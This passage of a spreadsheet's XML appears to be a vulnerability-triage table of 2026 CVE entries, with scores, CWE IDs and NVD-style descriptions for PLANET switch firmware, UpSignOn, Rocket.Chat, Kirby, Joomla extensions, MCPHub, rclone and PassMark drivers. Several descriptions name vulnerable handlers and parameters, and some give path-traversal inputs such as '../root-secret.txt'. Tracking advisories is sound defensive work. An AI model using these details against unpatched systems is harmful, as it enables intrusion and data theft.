      <c r="C3614" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3614" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3614" s="5" t="inlineStr"/>
      <c r="F3614" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3614" s="5" t="inlineStr"/>
      <c r="H3614" s="5" t="inlineStr"/>
      <c r="I3614" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3614" s="5" t="inlineStr"/>
      <c r="K3614" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3614" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated null pointer dereference vulnerability in /cgi-bin/dispatcher.cgi. The web_poe_alive_rmtip_post handler dereferences the rmtIP parameter without verifying its presence. A remote authenticated attacker can send a crafted request omitting the rmtIP parameter to cause the CGI process to dereference a null pointer and crash, resulting in denial of service of the web management interface.</t>
        </is>
      </c>
      <c r="M3614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75125</t>
        </is>
      </c>
    </row>
    <row r="3615">
      <c r="A3615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75126</t>
        </is>
      </c>
      <c r="C3615" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3615" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3615" s="5" t="inlineStr"/>
      <c r="F3615" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3615" s="5" t="inlineStr"/>
      <c r="H3615" s="5" t="inlineStr"/>
      <c r="I3615" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3615" s="5" t="inlineStr"/>
      <c r="K3615" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3615" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains multiple authenticated stack buffer overflow vulnerabilities in /cgi-bin/dispatcher.cgi. The following handlers copy attacker-controlled POST parameters into fixed-size stack buffers without length validation: web_vlan_membership_edit_dialog_post; web_dai_vlan_post; web_poe_alive_rmtip_post; web_sys_sntp_post; web_tool_upgradeManager_post; web_port_countersClr_post; web_rmon_statisticsClr_post; web_cablediag_copper_post; web_aaa_*Authlist* handlers; web_acl_mgmt_Rules_Apply_post; web_acl_mgmt_Rules_Edit_post; web_acl_*AceDel_post handlers; web_acl_*AceAdd/Edit_post handlers; web_acl_bindAdd_post; web_acl_bindEdit_post; web_snmp_v3view_add_post; web_snmp_v3group_add_post; web_snmp_v3community_add_post; web_snmp_v3host_add_post; web_snmp_notifyv3_add_post; web_snmp_v3user_add_post; web_snmpv3_remote_engineId_add_post; web_stp_globalSetting_post; web_isg_db_post; web_tacplus*_post handlers; web_dhcp_option82_post; and web_dhcp_port_option82_cid_post. A remote authenticated attacker can send crafted requests to crash the CGI process or web management service, resulting in denial of service.</t>
        </is>
      </c>
      <c r="M3615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75126</t>
        </is>
      </c>
    </row>
    <row r="3616">
      <c r="A3616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75135</t>
        </is>
      </c>
      <c r="C3616" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3616" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3616" s="5" t="inlineStr"/>
      <c r="F3616" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3616" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3616" s="5" t="inlineStr"/>
      <c r="I3616" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3616" s="5" t="inlineStr"/>
      <c r="K3616" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="L3616" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover the master password and decrypt vault contents by reading a retained backup key from the process memory of UpSignOn.exe, even after the vault has been re-locked. Attackers can extract the backup key from process memory to decrypt the encrypted master password backup stored in v6-vault1.DATA.txt, then use the recovered master password to decrypt the main vault and export all password manager entries in cleartext.</t>
        </is>
      </c>
      <c r="M3616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75135</t>
        </is>
      </c>
    </row>
    <row r="3617">
      <c r="A3617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75136</t>
        </is>
      </c>
      <c r="C3617" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3617" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3617" s="5" t="inlineStr"/>
      <c r="F3617" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3617" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3617" s="5" t="inlineStr"/>
      <c r="I3617" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3617" s="5" t="inlineStr"/>
      <c r="K3617" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3617" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains an insecure credential storage vulnerability that allows local attackers to retrieve the biometric unlock key stored in the Windows PasswordVault API without triggering any authentication prompt. Attackers can access the stored biometric key from a standard local process within the same Windows session to decrypt the protected vault files and export the entire password manager contents in cleartext.</t>
        </is>
      </c>
      <c r="M3617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75136</t>
        </is>
      </c>
    </row>
    <row r="3618">
      <c r="A3618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75137</t>
        </is>
      </c>
      <c r="C3618" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3618" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3618" s="5" t="inlineStr"/>
      <c r="F3618" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3618" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3618" s="5" t="inlineStr"/>
      <c r="I3618" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3618" s="5" t="inlineStr"/>
      <c r="K3618" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="L3618" s="5" t="inlineStr">
        <is>
          <t>UpSignOn for Windows before 7.19.0 contains a sensitive data exposure vulnerability that allows local attackers to recover cleartext vault data from process memory even after the application has been locked. Attackers can use the PROCESS_VM_READ permission to read the memory space of UpSignOn.exe and extract sensitive fields including entry names, URLs, usernames, passwords, TOTP secrets, and notes.</t>
        </is>
      </c>
      <c r="M3618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75137</t>
        </is>
      </c>
    </row>
    <row r="3619">
      <c r="A3619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75575</t>
        </is>
      </c>
      <c r="C3619" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3619" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3619" s="5" t="inlineStr"/>
      <c r="F3619" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3619" s="5" t="inlineStr"/>
      <c r="H3619" s="5" t="inlineStr"/>
      <c r="I3619" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3619" s="5" t="inlineStr"/>
      <c r="K3619" s="5" t="inlineStr">
        <is>
          <t>CWE-204, CWE-307</t>
        </is>
      </c>
      <c r="L3619" s="5" t="inlineStr">
        <is>
          <t>Rocket.Chat exposes the sendForgotPasswordEmail Meteor method without a DDP rate limit, so an unauthenticated caller may invoke it as often as it likes. The method is reachable over DDP and over the HTTP route POST /api/v1/method.callAnon/sendForgotPasswordEmail, and it triggers a password reset message for any address that matches an account. With no DDPRateLimiter rule registered for it, a caller can drive an unbounded volume of reset mail at a chosen address from the deployment's own mail sender, and can probe addresses at scale: the method answers true for an address with no account and for a successful send, but false when the address belongs to an account that authenticates through an external provider and Accounts_AllowPasswordChangeForOAuthUsers is off, so repeated calls distinguish that class of account. Later versions register a rule permitting ten calls per minute per client address.</t>
        </is>
      </c>
      <c r="M3619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75575</t>
        </is>
      </c>
    </row>
    <row r="3620">
      <c r="A3620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75592</t>
        </is>
      </c>
      <c r="C3620" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3620" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3620" s="5" t="inlineStr"/>
      <c r="F3620" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3620" s="5" t="inlineStr"/>
      <c r="H3620" s="5" t="inlineStr"/>
      <c r="I3620" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3620" s="5" t="inlineStr"/>
      <c r="K3620" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3620" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler used incomplete filesystem containment checks in src/Filesystem/Dir.php and src/Filesystem/F.php through Kirby\Filesystem\Dir::realpath() and Kirby\Filesystem\F::realpath(). The checks accepted a sibling directory whose path shared the intended root's string prefix, such as /var/www/site2 next to /var/www/site, because they did not require an exact match or a DIRECTORY_SEPARATOR boundary. A remote attacker could use Kirby\Cms\Media::thumb() to create and access thumbnails from image files in a PHP-readable sibling directory when that directory contained a valid .json thumbnail job file, potentially exposing staging sites, backups, or other internal sites and deleting the job file during processing. This issue is fixed in versions 4.9.5 and 5.5.2.</t>
        </is>
      </c>
      <c r="M3620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75592</t>
        </is>
      </c>
    </row>
    <row r="3621">
      <c r="A3621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77217</t>
        </is>
      </c>
      <c r="C3621" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3621" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3621" s="5" t="inlineStr"/>
      <c r="F3621" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3621" s="5" t="inlineStr"/>
      <c r="H3621" s="5" t="inlineStr"/>
      <c r="I3621" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3621" s="5" t="inlineStr"/>
      <c r="K3621" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-476</t>
        </is>
      </c>
      <c r="L3621" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains authenticated stack buffer overflow and null pointer dereference vulnerabilities in /cgi-bin/dispatcher.cgi. The web_radiusSrv*_post family of handlers copies the radKey, radKey_0, radDftParamKey, radName, and radIp POST parameters into fixed-size stack buffers without length validation, and additionally dereferences radName and radIp without verifying their presence in the request. A remote authenticated attacker can send crafted requests to crash the CGI process or web management service, resulting in denial of service.</t>
        </is>
      </c>
      <c r="M3621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77217</t>
        </is>
      </c>
    </row>
    <row r="3622">
      <c r="A3622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77218</t>
        </is>
      </c>
      <c r="C3622" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3622" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3622" s="5" t="inlineStr"/>
      <c r="F3622" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3622" s="5" t="inlineStr"/>
      <c r="H3622" s="5" t="inlineStr"/>
      <c r="I3622" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3622" s="5" t="inlineStr"/>
      <c r="K3622" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3622" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains authenticated stack buffer overflow vulnerabilities in /cgi-bin/dispatcher.cgi. The web_login_first_post handler copies the usrPass POST parameter into a fixed-size stack buffer without length validation, the web_sys_enablePasswd_post handler copies the enbPass POST parameter into a fixed-size stack buffer without length validation, and the web_sys_localUser_post handler copies the usrName and usrPass POST parameters into fixed-size stack buffers without length validation. A remote authenticated attacker can send a crafted request to crash the CGI process or web management service, resulting in denial of service.</t>
        </is>
      </c>
      <c r="M3622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77218</t>
        </is>
      </c>
    </row>
    <row r="3623">
      <c r="A3623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78084</t>
        </is>
      </c>
      <c r="C3623" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3623" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3623" s="5" t="inlineStr"/>
      <c r="F3623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3623" s="5" t="inlineStr"/>
      <c r="H3623" s="5" t="inlineStr"/>
      <c r="I3623" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3623" s="5" t="inlineStr"/>
      <c r="K3623" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-352</t>
        </is>
      </c>
      <c r="L3623" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing Access Control in Gallery Image Management in SP Property &lt; 4.1.4 -  The gallery management controller tasks lacked authorization checks and CSRF token validation.. Users could invoke file removal actions with arbitrary path strings or upload unverified file types.</t>
        </is>
      </c>
      <c r="M3623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78084</t>
        </is>
      </c>
    </row>
    <row r="3624">
      <c r="A3624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78085</t>
        </is>
      </c>
      <c r="C3624" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3624" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3624" s="5" t="inlineStr"/>
      <c r="F3624" s="5" t="inlineStr"/>
      <c r="G3624" s="5" t="inlineStr"/>
      <c r="H3624" s="5" t="inlineStr"/>
      <c r="I3624" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3624" s="5" t="inlineStr"/>
      <c r="K3624" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3624" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Path Traversal in Gallery Image Management in SP Property &lt; 4.1.4 - The gallery management controller tasks lacked directory confinement checks.</t>
        </is>
      </c>
      <c r="M3624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78085</t>
        </is>
      </c>
    </row>
    <row r="3625">
      <c r="A3625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78303</t>
        </is>
      </c>
      <c r="C3625" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3625" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3625" s="5" t="inlineStr"/>
      <c r="F3625" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3625" s="5" t="inlineStr"/>
      <c r="H3625" s="5" t="inlineStr"/>
      <c r="I3625" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3625" s="5" t="inlineStr"/>
      <c r="K3625" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L3625" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unvalidated Email Destination &amp; Form Manipulation in Booking Requests in SP Property &lt; 4.1.4 - Booking inquiries previously relied on client-submitted hidden fields for recipient routing, allowing potential email manipulation.</t>
        </is>
      </c>
      <c r="M3625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78303</t>
        </is>
      </c>
    </row>
    <row r="3626">
      <c r="A3626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78325</t>
        </is>
      </c>
      <c r="C3626" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3626" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3626" s="5" t="inlineStr"/>
      <c r="F3626" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3626" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3626" s="5" t="inlineStr"/>
      <c r="I3626" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3626" s="5" t="inlineStr"/>
      <c r="K3626" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3626" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in the Evernote and Google Keep note importers in Standard Notes for Android through 3.201.24 allows an attacker to execute arbitrary JavaScript in the application context when a victim imports a crafted .enex or Google Keep HTML file, leading to theft of encryption keys and note data, and arbitrary invocation of native device APIs.</t>
        </is>
      </c>
      <c r="M3626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78325</t>
        </is>
      </c>
    </row>
    <row r="3627">
      <c r="A3627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78374</t>
        </is>
      </c>
      <c r="C3627" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3627" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3627" s="5" t="inlineStr"/>
      <c r="F3627" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3627" s="5" t="inlineStr"/>
      <c r="H3627" s="5" t="inlineStr"/>
      <c r="I3627" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3627" s="5" t="inlineStr"/>
      <c r="K3627" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L3627" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomlart.com - Open mail relay via contact AJAX endpoint in T4 Page Builder extension &lt; 2.3.0 - The front-end JSON editor endpoint exposes an action called contact that requires no authentication, no CSRF token, no captcha (when no captcha plugin is enabled) and has no rate limiting. The attacker fully controls the recipient, subject and HTML body, and the mail is sent from the site's configured sender identity (mailfrom/fromname).</t>
        </is>
      </c>
      <c r="M3627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78374</t>
        </is>
      </c>
    </row>
    <row r="3628">
      <c r="A3628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79743</t>
        </is>
      </c>
      <c r="C3628" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3628" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3628" s="5" t="inlineStr"/>
      <c r="F3628" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3628" s="5" t="inlineStr"/>
      <c r="H3628" s="5" t="inlineStr"/>
      <c r="I3628" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3628" s="5" t="inlineStr"/>
      <c r="K3628" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3628" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.13, MCPB File Upload Handler extracts a ZIP file and reads manifest.json from it. The name field in the manifest is directly concatenated into a file path (line 107) without any sanitization or path traversal character validation. An attacker can craft a malicious MCPB file where manifest.name is set to something like ../../../etc/malicious, causing the file to be extracted to an arbitrary location on the file system. The cleanupOldMcpbServer function (line 110) also uses the unsanitized name, potentially allowing deletion of arbitrary directories. This issue has been patched in version 0.12.13.</t>
        </is>
      </c>
      <c r="M3628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79743</t>
        </is>
      </c>
    </row>
    <row r="3629">
      <c r="A3629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79776</t>
        </is>
      </c>
      <c r="C3629" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3629" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3629" s="5" t="inlineStr"/>
      <c r="F3629" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3629" s="5" t="inlineStr"/>
      <c r="H3629" s="5" t="inlineStr"/>
      <c r="I3629" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3629" s="5" t="inlineStr"/>
      <c r="K3629" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3629" s="5" t="inlineStr">
        <is>
          <t>rclone before 1.75.0 mounts the pprof debug handler as its own router route, bypassing the fail-closed authentication rule in the main handler. Attackers can access the /debug/pprof/cmdline endpoint unauthenticated to retrieve the full process argv including backend credentials.</t>
        </is>
      </c>
      <c r="M3629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79776</t>
        </is>
      </c>
    </row>
    <row r="3630">
      <c r="A3630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79781</t>
        </is>
      </c>
      <c r="C3630" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3630" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3630" s="5" t="inlineStr"/>
      <c r="F3630" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3630" s="5" t="inlineStr"/>
      <c r="H3630" s="5" t="inlineStr"/>
      <c r="I3630" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3630" s="5" t="inlineStr"/>
      <c r="K3630" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3630" s="5" t="inlineStr">
        <is>
          <t>rclone serve s3 before 1.74.4 contains a path traversal vulnerability that allows attackers to read and overwrite root-level files by using dot-dot segments in S3 object keys. Attackers can send requests with object keys like ../root-secret.txt to escape the bucket namespace and access files in the serve root directory.</t>
        </is>
      </c>
      <c r="M3630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79781</t>
        </is>
      </c>
    </row>
    <row r="3631">
      <c r="A3631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80113</t>
        </is>
      </c>
      <c r="C3631" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3631" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3631" s="5" t="inlineStr"/>
      <c r="F3631" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3631" s="5" t="inlineStr"/>
      <c r="H3631" s="5" t="inlineStr"/>
      <c r="I3631" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3631" s="5" t="inlineStr"/>
      <c r="K3631" s="5" t="inlineStr">
        <is>
          <t>CWE-782, CWE-787</t>
        </is>
      </c>
      <c r="L3631" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to clear arbitrary bits at any physical memory address due to missing validation of the physical address parameter in an exposed IOCTL handler. Attackers can obtain a device handle and supply an arbitrary 64-bit physical address with a bit index to invoke MmMapIoSpace and clear bits in kernel code pages or page table entries, enabling local privilege escalation or system compromise.</t>
        </is>
      </c>
      <c r="M3631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80113</t>
        </is>
      </c>
    </row>
    <row r="3632">
      <c r="A3632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80115</t>
        </is>
      </c>
      <c r="C3632" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3632" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3632" s="5" t="inlineStr"/>
      <c r="F3632" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3632" s="5" t="inlineStr"/>
      <c r="H3632" s="5" t="inlineStr"/>
      <c r="I3632" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3632" s="5" t="inlineStr"/>
      <c r="K3632" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L3632" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation and denial-of-service vulnerability in DirectIo64.sys that allows local attackers to read arbitrary Model-Specific Registers or write zero to any MSR through exposed IOCTLs with insufficient blocklist enforcement. Attackers can exploit the unrestricted write IOCTL to zero out the system call handler MSR, causing an immediate unrecoverable kernel crash on the next system call, or read security-sensitive MSRs used to locate kernel data structures.</t>
        </is>
      </c>
      <c r="M3632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80115</t>
        </is>
      </c>
    </row>
    <row r="3633">
      <c r="A3633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80117</t>
        </is>
      </c>
      <c r="C3633" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3633" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3633" s="5" t="inlineStr"/>
      <c r="F3633" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3633" s="5" t="inlineStr"/>
      <c r="H3633" s="5" t="inlineStr"/>
      <c r="I3633" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3633" s="5" t="inlineStr"/>
      <c r="K3633" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L3633" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to issue arbitrary IN and OUT instructions to any x86 I/O port due to missing allowlist or port validation on exposed IOCTLs. Attackers can obtain a device handle and write to sensitive ports including the PS/2 controller port, CPU reset ports, CMOS configuration ports, and interrupt controller ports to cause an immediate system reset or other hardware-level manipulation from a standard user account.</t>
        </is>
      </c>
      <c r="M3633" s="6" t="inlineStr">
        <is>
